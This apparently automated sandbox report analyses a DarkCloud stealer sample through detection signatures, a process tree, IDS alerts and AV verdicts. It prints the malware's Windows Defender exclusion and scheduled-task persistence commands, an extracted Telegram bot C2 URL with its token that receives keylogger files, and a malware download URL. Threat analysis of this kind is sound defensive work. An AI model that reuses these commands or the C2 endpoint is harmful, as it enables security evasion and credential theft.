Windows Analysis Report
g44YQtTyjN.exe

Overview

General Information

Sample name: g44YQtTyjN.exe (renamed because original name is a hash value)
Original sample name: 94213c6a04939eca937ffffb3f938a7dfc297cc20cd7d02d5a8a06b69d56dc79.exe
Analysis ID: 1632386
MD5: a6ccb9255baee007cb4350101a2a8b2b
SHA1: ff666e71f6c4e071f7c836de86eccf73f9717f54
SHA256: 94213c6a04939eca937ffffb3f938a7dfc297cc20cd7d02d5a8a06b69d56dc79
Tags: DarkCloud, exe, user-adrian__luca

Detection

DarkCloud
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkCloud
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • g44YQtTyjN.exe (PID: 3036 cmdline: "C:\Users\user\Desktop\g44YQtTyjN.exe" MD5: A6CCB9255BAEE007CB4350101A2A8B2B)
    • powershell.exe (PID: 6828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8624 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • ECmmsbHOaKPh.exe (PID: 8812 cmdline: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe MD5: A6CCB9255BAEE007CB4350101A2A8B2B)
    • schtasks.exe (PID: 9060 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 9068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 9112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
DarkCloud Stealer | Stealer is written in Visual Basic. | No Attribution | (none) | https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud
{"C2 url": "https://api.telegram.org/bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 220, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385698, "document": {"file_name": "KeyDataflSwUSqo.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPcZ8tv4tmwdnKQ1gJiUYADxWiYVHIAAoMdAAKHvmBSmodpD4Bt-602BA", "file_unique_id": "AgADgx0AAoe-YFI", "file_size": 396}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 217, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385693, "document": {"file_name": "KeyDatabcwuTujf.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPZZ8tv3Zq9N7z202gKD7GgchhBXPEAAoAdAAKHvmBSJvNAnQvNUSE2BA", "file_unique_id": "AgADgB0AAoe-YFI", "file_size": 396}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 215, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385691, "document": {"file_name": "KeyDatahOJefols.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPXZ8tv21f1sYVl_AKEYdUEvQ4ROoAAAn4dAAKHvmBSvfbwtz5zpVQ2BA", "file_unique_id": "AgADfh0AAoe-YFI", "file_size": 363}, "caption": "DC-KL:::user-PC\\user\\"}}, {"ok": true, "result": {"message_id": 218, "from": {"id": 7879240328, "is_bot": true, "first_name": "ugobest147", "username": "ugobest147bot"}, "chat": {"id": 2001212894, "first_name": "Joe", "last_name": "Joe", "type": "private"}, "date": 1741385695, "document": {"file_name": "KeyDatajPmvaPVG.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAPaZ8tv3xWF8_G2x5SdqzDbXOwIRFgAAoEdAAKHvmBS-Qw2BR_HX882BA", "file_unique_id": "AgADgR0AAoe-YFI", "file_size": 363}, "caption": "DC-KL:::user-PC\\user\\"}}]}
Source | Rule | Description | Author | Strings
0000000C.00000002.2559323570.000000000042B000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth | 0x2dd84:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
(31 entries in total; first 5 shown)

Source | Rule | Description | Author | Strings
17.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.g44YQtTyjN.exe.3d6cec8.0.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
12.2.RegSvcs.exe.403580.0.unpack | JoeSecurity_DarkCloud | Yara detected DarkCloud | Joe Security |
(57 entries in total; first 5 shown)

System Summary

Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", ProcessId: 6828, ProcessName: powershell.exe
Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe, ParentImage: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe, ParentProcessId: 8812, ParentProcessName: ECmmsbHOaKPh.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp", ProcessId: 9060, ProcessName: schtasks.exe
Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", ProcessId: 8624, ProcessName: schtasks.exe
Source: Process started Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe", ProcessId: 6828, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\g44YQtTyjN.exe", ParentImage: C:\Users\user\Desktop\g44YQtTyjN.exe, ParentProcessId: 3036, ParentProcessName: g44YQtTyjN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp", ProcessId: 8624, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T23:13:28.659495+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 149.154.167.220 | 443 | TCP
2025-03-07T23:13:48.417026+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:02.722868+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:15.547445+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:24.443469+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49710 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:30.389704+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:34.602753+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:39.462754+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:44.023967+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:48.380560+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:52.590344+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 149.154.167.220 | 443 | TCP
2025-03-07T23:15:00.041323+0100 | 2045300 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T23:13:27.973496+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49705 | 149.154.167.220 | 443 | TCP
2025-03-07T23:13:47.761112+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:01.892031+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49708 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:14.823167+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:23.732628+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:29.601834+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:33.880451+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:38.783991+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49713 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:43.313410+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49714 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:47.655031+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49715 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:51.837548+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:55.710776+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:59.252822+0100 | 2852388 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T23:13:27.973496+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 149.154.167.220 | 443 | TCP
2025-03-07T23:13:47.761112+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:01.892031+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49708 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:14.823167+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49709 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:23.732628+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49710 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:29.601834+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49711 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:33.880451+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:38.783991+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49713 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:43.313410+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49714 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:47.655031+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49715 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:51.837548+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49716 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:55.710776+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49717 | 149.154.167.220 | 443 | TCP
2025-03-07T23:14:59.252822+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49718 | 149.154.167.220 | 443 | TCP


AV Detection

Source: http://nfs.sa.com Avira URL Cloud: Label: malware
Source: https://nfs.sa.com Avira URL Cloud: Label: malware
Source: https://nfs.sa.com/nano/schvost.exe Avira URL Cloud: Label: malware
Source: RegSvcs.exe.8760.12.memstrmin Malware Configuration Extractor: Telegram RAT (the same Telegram RAT configuration as extracted and listed above)
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe ReversingLabs: Detection: 65%
Source: g44YQtTyjN.exe Virustotal: Detection: 71%
Source: g44YQtTyjN.exe ReversingLabs: Detection: 65%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: g44YQtTyjN.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: g44YQtTyjN.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: W.pdb4 source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: GCbd.pdbSHA256 source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr
Source: Binary string: GCbd.pdb source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.dr
Source: C:\Users\user\Desktop\g44YQtTyjN.exe Code function: 4x nop then jmp 06C6D6B8h 0_2_06C6CEB2
Source: C:\Users\user\Desktop\g44YQtTyjN.exe Code function: 4x nop then jmp 06C6D6B8h 0_2_06C6CECB
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Code function: 4x nop then jmp 0570CF20h 13_2_0570C71A
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe Code function: 4x nop then jmp 0570CF20h 13_2_0570C733

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49705 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49709 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49709 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49709 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49713 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49713 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49715 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49708 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49708 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49705 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49710 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49710 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49717 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49715 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49717 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49707 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49712 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49707 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49713 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49712 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49710 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49705 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49707 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49715 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49712 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49714 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49714 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49714 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49718 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49718 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49718 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49708 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49716 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49716 -> 149.154.167.220:443
